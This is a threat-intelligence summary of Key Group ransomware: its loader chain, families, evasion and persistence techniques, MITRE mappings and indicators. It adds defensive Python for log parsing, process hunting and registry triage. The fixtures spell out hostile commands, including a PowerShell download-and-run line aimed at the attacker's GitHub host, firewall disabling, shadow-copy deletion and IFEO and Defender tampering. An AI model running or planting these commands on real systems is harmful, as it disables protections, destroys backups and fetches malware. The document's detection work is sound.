Keypoints
- Delivery used multi-stage loaders: LNK files with obfuscated PowerShell that fetch SFX archives, which unpack loaders and final ransomware binaries.
- Primary hosting and C2 artifacts observed on public GitHub repositories (raw.githubusercontent[.]com/max444432/RMS2) and public file hosts (fastxstreamz.herokuapp[.]com).
- Ransomware families used include Chaos, Xorist, Annabelle (with MBR locker), Slam, RuRansom (wiper), Hakuna Matata, UX-Cryptor, and Judge/NoCry, each with distinct extensions and behaviors.
- Evasion and destructive techniques: disabling the Windows Firewall and Defender, disabling UAC, the Registry Editor and Run through policy keys, IFEO Debugger modifications that stop named processes from launching, shadow copy deletion, and MBR locking were observed across samples (Annabelle, RuRansom, Hakuna Matata).
- Persistence mechanisms varied by family: startup folder shortcuts, Run and RunOnce keys under both HKLM and per-user hives, Winlogon Shell replacement, and file association changes so that opening an encrypted file relaunches the binary.
- Some variants exfiltrated or published generated encryption keys and victim identifiers to a Telegram channel URL instead of a classic C2, enabling public posting of keys (Judge/NoCry behavior).
- Loaders used .NET WebClient.DownloadData and PowerShell download routines to pull payloads directly from GitHub/raw hosts, facilitating easy reuse and tracking of samples.
MITRE Techniques
- [T1059.001] PowerShell – Used to execute obfuscated download and extraction commands from LNK files (‘obfuscated PowerShell command that downloaded an SFX archive’).
- [T1059.003] Windows Command Shell – cmd.exe was used to run dropper actions and to write the ransom note via echo redirection (‘cmd.exe /c cd “%systemdrive%\Users\Public\Desktop” & … & echo […] 1>info-0v92.txt’).
- [T1547.001] Registry Run Keys / Startup Folder – Multiple samples created startup shortcuts or registry Run entries for persistence (‘HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run “Alcmeter” = “C:\Users\[redacted]\AppData\Local\Temp\fj6qD14qWC1unS2.exe”’).
- [T1547.004] Winlogon Helper DLL – Ransomware overwrote the Winlogon Shell value so the payload runs in place of Explorer at logon (‘HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon “Shell” = “$selfpath”’).
- [T1134] Access Token Manipulation – Listed in the article's TTP mapping as a privilege escalation technique; no specific token-manipulation artifact is quoted, so this should be read as the article's attribution rather than an observed command (‘Access Token Manipulation – T1134’).
- [T1027] Obfuscated Files or Information – Payloads and dropper commands were obfuscated to hinder detection (‘obfuscated PowerShell command’).
- [T1562.004] Disable or Modify System Firewall – Samples executed netsh to turn off the Windows Firewall on every profile (‘NetSh Advfirewall set allprofiles state off’).
- [T1546.012] Image File Execution Options Injection – Ransomware set IFEO Debugger values to a bogus path so the named processes fail to launch, which here serves defense evasion rather than persistence (‘HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\[process] “Debugger” = “RIP”’).
- [T1003] OS Credential Dumping – Included in the article's TTP list without a quoted artifact, indicating attempts to harvest credentials for lateral movement or persistence (‘Credential Dumping – T1003’).
- [T1041] Exfiltration Over Command and Control Channel – Data and generated keys were sent/published via a Telegram channel URL instead of a traditional C2 (‘hxxps://t[.]me/s/SBUkr?[username]_[generated_id]=[generated_key]’).
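The Telegram scheme in T1041 above carries the victim identifier and the key in the URL's query string, so a web proxy or TLS-inspection log that recorded the request may still hold the key after the sample itself is gone (without TLS inspection only the SNI, t.me, is visible). The Python below is an added example, not code from the report or from the malware: the proxy log lines are constructed, the channel name is the one the report quotes, and the username, id and key formats are assumptions, since the report only shows the template `[username]_[generated_id]=[generated_key]`.

```python
"""Recover the victim identifier and key that a Judge/NoCry-style sample sends
through a Telegram channel URL, from web-proxy logs.

Added example.  PROXY_LOG is constructed; the username/id/key formats are
assumptions (the report only shows the URL template)."""
import re
from urllib.parse import parse_qsl, urlparse

# Constructed proxy log lines: "<timestamp> <client_ip> <method> <url> <status>".
PROXY_LOG = """\
2024-10-01T09:12:07Z 10.0.5.23 GET https://t.me/s/SBUkr?DESKTOP-7H2K1_a8f3c2d1=Qm9ndXNLZXlGb3JEZW1vT25seTEyMzQ1Njc4 200
2024-10-01T09:12:09Z 10.0.5.23 GET https://raw.githubusercontent.com/max444432/RMS2/main/ 404
2024-10-01T09:13:44Z 10.0.5.77 GET https://t.me/s/somechannel 200
"""

TELEGRAM_HOSTS = {"t.me", "telegram.me"}
# Assumed shape of the query parameter name: "<username>_<generated_id>".
# The last underscore separates the two, so usernames may contain underscores.
_ENTRY = re.compile(r"^(.+)_([^_]+)$")


def refang(url):
    """Turn the defanged form used in reports (hxxps://t[.]me) back into a real URL."""
    return url.replace("hxxp", "http").replace("[.]", ".")


def extract_key_posts(log_text, channel="SBUkr"):
    """Return one dict per log line matching t.me/s/<channel>?<user>_<id>=<key>."""
    posts = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue
        url = urlparse(refang(fields[3]))
        if url.hostname not in TELEGRAM_HOSTS or url.path != f"/s/{channel}":
            continue
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            m = _ENTRY.match(name)
            if m and value:
                posts.append({
                    "timestamp": fields[0],
                    "client": fields[1],
                    "username": m.group(1),
                    "generated_id": m.group(2),
                    "key": value,
                })
    return posts


if __name__ == "__main__":
    for post in extract_key_posts(PROXY_LOG):
        print(f"{post['timestamp']} {post['client']} victim={post['username']} "
              f"id={post['generated_id']} key={post['key']}")
```

The recovered value is whatever the sample placed in the query string; whether it is the raw AES key, an encoding of it, or a key identifier has to be confirmed against the sample's key-generation routine before it is used for recovery.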
Indicators of Compromise
- [File Hash] notable ransomware binaries – C2E1048E1E5130E36AF297C73A83AFF6 (warnep.exe, Chaos), DA09FCF140D3AAD0390FB7FAF7260EB5 (Hakuna Matata), and many other hashes listed in the report.
- [File Names] dropped payloads and droppers – warnep.exe, Россия-обновление.docs.exe (Russian for “Russia-update”, RuRansom variant), telegram-raid-botnet.exe (Hakuna Matata payload).
- [URLs / Domains] download and C2 hosts – hxxps://raw.githubusercontent[.]com/max444432/RMS2/main/ (GitHub raw hosting), hxxp://fastxstreamz.herokuapp[.]com/… (SFX/EXE hosting), and make-catherine.at.ply[.]gg (XWorm C2).
- [Registry Keys / Startup Artifacts] persistence indicators – Run/Winlogon entries (e.g., HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run “UpdateBackup” = “$selfpath”), startup .url shortcuts in the user startup folder.
- [Extensions / Artifacts] encrypted file extensions and ransom notes – .huis_bn, .Keygroup777tg.EXE, .keygroup777tg, keygroup777.txt, and info-0v92.txt found on infected systems.
Key Group’s infection chain consistently used multi-stage loaders: a phishing-distributed LNK file executed an obfuscated PowerShell command to download an SFX self-extracting archive, which unpacked a secondary loader that fetched final payloads (examples: Chaos MD5 C910DA0BAA2E08… and Xorist MD5 E0C74416…). Some .NET loaders used WebClient.DownloadData to pull executables directly from raw.githubusercontent[.]com repositories, enabling simple rehosting and rapid distribution of multiple leaked builders and wipers.
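The chain above can be hunted in process-creation telemetry (Sysmon event 1 or an EDR equivalent) by decoding the PowerShell payload the LNK launches and matching the download hosts the report names, and the same pass can flag the netsh firewall and vssadmin shadow-copy commands the samples run before encryption. The Python below is an added example, not code from the report or from Key Group: the events are constructed, the file name `payload.exe` is invented because the page only gives the repository path, and the ransom-note text is a placeholder.

```python
"""Hunt for the Key Group loader chain and pre-encryption commands in
process-creation events.

Added example.  EVENTS is constructed telemetry, not data from the report;
"payload.exe" and the ransom-note text are invented."""
import base64
import re
from urllib.parse import urlparse

# Hosts the report names as payload hosting / download infrastructure.
WATCHLIST_HOSTS = ("raw.githubusercontent.com", "fastxstreamz.herokuapp.com")

# Plaintext of the command the constructed LNK runs.  The report's PowerShell
# was obfuscated; -EncodedCommand stands in for that here.
_PLAIN = ("$u='https://raw.githubusercontent.com/max444432/RMS2/main/payload.exe';"
          "(New-Object Net.WebClient).DownloadFile($u,\"$env:TEMP\\p.exe\");"
          "Start-Process \"$env:TEMP\\p.exe\"")
_ENC = base64.b64encode(_PLAIN.encode("utf-16-le")).decode()

# (parent image, image, command line) -- constructed events
EVENTS = [
    ("explorer.exe", "powershell.exe",
     f"powershell.exe -nop -w hidden -ep bypass -EncodedCommand {_ENC}"),
    ("p.exe", "netsh.exe", "NetSh Advfirewall set allprofiles state off"),
    ("p.exe", "vssadmin.exe", "vssadmin delete shadows /all /quiet"),
    ("p.exe", "cmd.exe",
     'cmd.exe /c cd "%systemdrive%\\Users\\Public\\Desktop" & '
     'echo Your files are encrypted 1>info-0v92.txt'),
    ("explorer.exe", "powershell.exe", "powershell.exe -c Get-Date"),  # benign
]

_ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
_DOWNLOAD = re.compile(r"DownloadFile|DownloadData|DownloadString|Invoke-WebRequest"
                       r"|\biwr\b|\bcurl\b|Start-BitsTransfer", re.I)
_URL = re.compile(r"""https?://[^\s'"()]+""", re.I)


def decode_encoded_command(cmdline):
    """Return the UTF-16LE plaintext behind -EncodedCommand, or None."""
    m = _ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def watchlisted_urls(text):
    """URLs in text whose host is, or is under, a watchlisted host."""
    hits = []
    for url in _URL.findall(text):
        host = (urlparse(url).hostname or "").lower()
        if any(host == w or host.endswith("." + w) for w in WATCHLIST_HOSTS):
            hits.append(url)
    return hits


def classify(parent, image, cmdline):
    """Tags for one process-creation event; empty list means nothing matched."""
    tags = []
    decoded = decode_encoded_command(cmdline)
    effective = decoded if decoded is not None else cmdline
    if decoded is not None:
        tags.append("encoded_powershell")
    if (image.lower() == "powershell.exe" and parent.lower() == "explorer.exe"
            and _DOWNLOAD.search(effective) and watchlisted_urls(effective)):
        tags.append("loader_download_from_watchlisted_host")
    low = effective.lower()
    if "advfirewall" in low and "state off" in low:
        tags.append("firewall_disabled")
    if "vssadmin" in low and "delete shadows" in low:
        tags.append("shadow_copies_deleted")
    if (image.lower() == "cmd.exe" and "echo" in low
            and re.search(r"1?>\s*\S+\.txt", low) and "public\\desktop" in low):
        tags.append("ransom_note_written_via_echo")
    return tags


def hunt(events=EVENTS):
    """(index, tags) for every event that produced at least one tag."""
    out = []
    for i, event in enumerate(events):
        tags = classify(*event)
        if tags:
            out.append((i, tags))
    return out


if __name__ == "__main__":
    for i, tags in hunt():
        print(i, EVENTS[i][1], tags)
```

The explorer.exe parent is what an LNK double-click looks like in telemetry; the same rule fires on any shortcut-launched PowerShell that reaches a watchlisted host, so treat the host list as a starting point and widen it with the file hosts seen in your own environment.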
Ransomware samples implemented multiple evasion and destructive actions before encryption or locking: disabling Firewall via NetSh, setting Defender policy keys to disable real-time protection, turning off UAC and Registry Editor, modifying Image File Execution Options (IFEO) to break specific processes, and deleting shadow copies with vssadmin. Annabelle additionally contained an MBR locker and the observed RuRansom variant behaved as a wiper; several families used AES-CBC/AES-256-CBC for file encryption and appended identifiable extensions (.huis_bn, .keygroup777tg, random 5-char extensions), while some variants encoded filenames in Base64.
Persistence was achieved through varied techniques across families: creating startup folder .url shortcuts pointing to copied executables, adding Run/Winlogon registry entries (HKLM and per-user HKU keys), altering file association keys so opening encrypted files would relaunch the binary, and adding numerous Run keys and RunOnce entries. Communication and key handling deviated from classic C2 in at least one sample (Judge/NoCry), which constructed a Telegram channel URL and posted the victim identifier and generated key there (hxxps://t[.]me/s/SBUkr?[username]_[generated_id]=[generated_key]), so the encryption metadata ended up on a public channel rather than on attacker-controlled infrastructure. Read more: https://securelist.com/key-group-ransomware-samples-and-telegram-schemes/114025/
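Because the persistence and evasion artifacts described above are all registry values, one triage pass over an exported hive (reg export, a forensic .reg dump, or a live query rendered in the same syntax) catches most of them at once. The Python below is an added example, not code from the report: REG_EXPORT is a constructed export in .reg syntax, the user name `victim` and the file names are invented, and the ATT&CK IDs attached to each finding are this example's own mapping (Run keys T1547.001, Winlogon Shell T1547.004, IFEO Debugger T1546.012, file-association handler T1546.001, policy-disabled tooling T1562.001).

```python
"""Triage a Windows registry export for the persistence and defence-evasion
values the Key Group samples set.

Added example.  REG_EXPORT is constructed in .reg syntax; it is not an export
from an infected host, and the user name / file names are invented."""
import re

REG_EXPORT = r"""
[HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run]
"Alcmeter"="C:\\Users\\victim\\AppData\\Local\\Temp\\fj6qD14qWC1unS2.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell"="C:\\Users\\victim\\AppData\\Roaming\\update.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe]
"Debugger"="RIP"

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection]
"DisableRealtimeMonitoring"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
"EnableLUA"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000001

[HKEY_CLASSES_ROOT\keygroup777tgfile\shell\open\command]
@="\"C:\\Users\\victim\\AppData\\Roaming\\update.exe\" \"%1\""

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SecurityHealth"="C:\\Windows\\System32\\SecurityHealthSystray.exe"
"""

_SECTION = re.compile(r"^\[(.+)\]$")
_VALUE = re.compile(r'^(?:"((?:[^"\\]|\\.)*)"|(@))=(.*)$')
# Locations an unprivileged process can write to; an autorun pointing here is suspect.
USER_WRITABLE = re.compile(
    r"\\(?:Users\\[^\\]+\\AppData|ProgramData|Windows\\Temp|Users\\Public)\\", re.I)


def _decode_data(data):
    """Decode the .reg representations used here: quoted strings and dword:."""
    if data.startswith("dword:"):
        return int(data[len("dword:"):], 16)
    if data.startswith('"') and data.endswith('"'):
        return re.sub(r'\\(["\\])', r"\1", data[1:-1])
    return data


def parse_reg(text):
    """Yield (key_path, value_name, data); the default value is named '@'."""
    key = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = _SECTION.match(line)
        if m:
            key = m.group(1)
            continue
        m = _VALUE.match(line)
        if m and key is not None:
            yield key, "@" if m.group(2) else m.group(1), _decode_data(m.group(3))


def triage(text):
    """Findings as (technique, key, value_name, note), in export order."""
    findings = []
    for key, name, data in parse_reg(text):
        k, n = key.lower(), name.lower()
        if re.search(r"\\currentversion\\run(?:once)?$", k):
            if isinstance(data, str) and USER_WRITABLE.search(data):
                findings.append(("T1547.001", key, name, "autorun from user-writable path"))
        elif (k.endswith("\\windows nt\\currentversion\\winlogon") and n == "shell"
              and str(data).strip().lower() != "explorer.exe"):
            findings.append(("T1547.004", key, name, "Winlogon Shell replaced"))
        elif "\\image file execution options\\" in k and n == "debugger":
            findings.append(("T1546.012", key, name, f"IFEO Debugger hijack ({data})"))
        elif "windows defender" in k and n.startswith("disable") and data == 1:
            findings.append(("T1562.001", key, name, "Defender component disabled by policy"))
        elif k.endswith("\\policies\\system") and n == "enablelua" and data == 0:
            findings.append(("T1562.001", key, name, "UAC disabled"))
        elif k.endswith("\\policies\\system") and n == "disableregistrytools" and data == 1:
            findings.append(("T1562.001", key, name, "Registry Editor disabled"))
        elif (k.endswith("\\shell\\open\\command") and isinstance(data, str)
              and USER_WRITABLE.search(data)):
            findings.append(("T1546.001", key, name, "file handler points at user-writable binary"))
    return findings


if __name__ == "__main__":
    for technique, key, name, note in triage(REG_EXPORT):
        print(f"{technique:10} {note:45} {key} [{name}]")
```

The Run-key rule deliberately ignores entries under Program Files or System32 (the SecurityHealth value in the sample is left alone); the Winlogon and IFEO rules fire on any non-default value because there is no benign reason for those to change on an endpoint.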